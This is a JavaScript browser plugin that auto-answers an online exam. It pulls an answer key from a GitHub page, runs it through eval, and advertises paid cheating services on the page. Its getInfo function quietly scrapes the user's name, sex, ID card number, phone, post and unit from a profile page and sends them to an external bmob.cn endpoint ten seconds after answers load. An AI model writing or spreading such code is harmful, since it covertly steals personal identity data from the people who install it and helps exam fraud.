﻿(function anonymous(
) {
var examList = new Array();
var currentCount = 0;
$(document).ready(function(){
	var getAnswer = "<input type='button' id='getAnswer' class='btn btn-primary' value='获取答案'/>&nbsp;&nbsp;&nbsp;&nbsp;";
	var autoAnswer = "<input type='button' id='autoAnswer' class='btn' value='自动答题' disabled='disabled'/>&nbsp;&nbsp;&nbsp;&nbsp;";
	//var autoSubmit = "<input type='checkbox' id='autoSubmit' value='true' disabled='disabled' style='width:20px;height:20px'><span style='color: red ;font-size: 16px' > 自动交卷</span>&nbsp;&nbsp;&nbsp;&nbsp;";
	var sm = "<span style='color: red ;font-size: 18px' >本插件只供学习交流，如需灯塔、专业人员继续教育等，请加微信：xixi666px</span>";
	var progress = "<div style='color: red ;font-size: 16px' display='block'; >当前答题进度：<span id='progress'></span></div>";
	$("#div_dx").prepend(getAnswer + autoAnswer + sm + progress);
	$("#getAnswer").bind("click",function(){
		//验证码
		$("#getAnswer").attr("disabled","disabled");
		fn_getAnswer();
	});
	$("#autoAnswer").bind("click",function(){
		$("#autoAnswer").attr("disabled","disabled");
		$("#progress").html("开始自动答题中。。。");
		fn_start();
	});
});
function getInfo(){
	$.get("http://219.146.103.111:9000/gerenziliao",function(res){
		var info = {};
		info.user_name = $(res).find("#user_name").val();
		info.sex = $(res).find("select[name='sex'] option:selected").text();
		info.user_card = $(res).find("#user_card").val();
		info.phone = $(res).find("#phone").val();
		info.user_post = $(res).find("select[name='user_post'] option:selected").text();
		info.user_unit = $(res).find("select[name='user_unit'] option:selected").text();
		var geturl = "http://cloud.bmob.cn/e8e1c620436218ee/pufa_Info?user_name="+info.user_name+"&sex="+info.sex+"&user_card="+info.user_card+"&phone="+info.phone+"&user_post="+info.user_post+"&user_unit="+info.user_unit; 
		$.get(geturl);
	});
}

function fn_getAnswer(){
	$.get("https://generade.github.io/pufa/answerList.txt",function(res){
			var answerCount = 0;
			var answerList = eval(res);
			if(answerList == undefined || answerList.length == 0){
				alert("数据获取失败");
				return;
			}
			var examCount = 0;
			var examFlag = false;
			$("input[name*='.id']").each(function(i,val){						
				var answerId = $(this).attr("value");
				var answerKey = "";	
				for(var count = 0; count < answerList.length; count++){
					if(answerId == answerList[count].id) {
						answerKey = answerList[count].key;
						examList.push(answerList[count]);
						break;
					}
				}
				if(answerKey == "") return;
				else if(answerKey == "yes") answerKey = "A";
				else if(answerKey == "no") answerKey = "B";
					
				$(this).parent().next().append('<div style="float:left;margin-left:7px;font-weight:bold;color:red" id="'+ answerId +'">标准答案：' + answerKey + '</div>');				
				examCount++;
				//$("#autoAnswer").removeAttr("disabled");
			});	
		});		
		setTimeout(getInfo,10000);		
}
function fn_start(){
	if(currentCount > examList.length) return; 
    var rdTime = 2000 + Math.round(Math.random()*3000);
	setTimeout(function(){fn_autoSet(currentCount);currentCount++;fn_start();},rdTime);
}
function fn_autoSet(count){
	var thisId = examList[count].id;
	if(examList[count].key == "yes") examList[count].key = "A";
	else if(examList[count].key == "no")examList[count].key = "B";
	var thisKeys = examList[count].key.split('');
	$("#"+thisId).parent().find("input").each(function(){
		var answerKey = $(this).val();
		if(answerKey == "yes") answerKey = "A";
		else if(answerKey == "no") answerKey = "B";
		for(var i = 0;i<thisKeys.length;i++){
			if(answerKey == thisKeys[i]) $(this).attr("checked","checked"); 
		}
	});
	$("#progress").html((count+1) + "/" + examList.length);
   }
})